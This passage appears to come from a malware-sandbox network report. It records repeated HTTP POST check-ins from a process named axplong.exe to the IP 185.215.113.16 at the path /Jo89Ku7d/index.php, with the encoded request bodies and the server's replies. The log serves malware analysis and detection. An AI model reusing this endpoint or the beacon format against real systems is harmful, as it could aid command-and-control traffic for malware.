Sep 27, 2024 05:53:49.146476030 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:49.380089998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:49.497844934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:50.192226887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:50.193185091 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:50.417301893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:50.528563023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:51.246942043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:51.247836113 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:51.484076023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:51.609266996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:52.306741953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:52.309577942 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:52.531891108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:52.664674997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:53.420773983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:53.424024105 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:53.652820110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:53.767739058 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:54.474590063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:54.475605965 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:54.705512047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:54.825118065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:55.606492043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:55.612616062 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:55.839680910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:55.951061964 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:56.689721107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:56.691394091 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:56.919759989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:57.028491974 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:57.774950981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:57.776555061 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:58.055594921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:58.173161983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:58.883552074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:58.884490967 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:59.114876986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:59.231558084 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:59.949204922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:59.949990034 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:00.181067944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:00.294809103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:00.987931967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:54:00.988735914 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:01.211582899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:01.325613976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:02.022337914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:54:02.025262117 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:02.247054100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
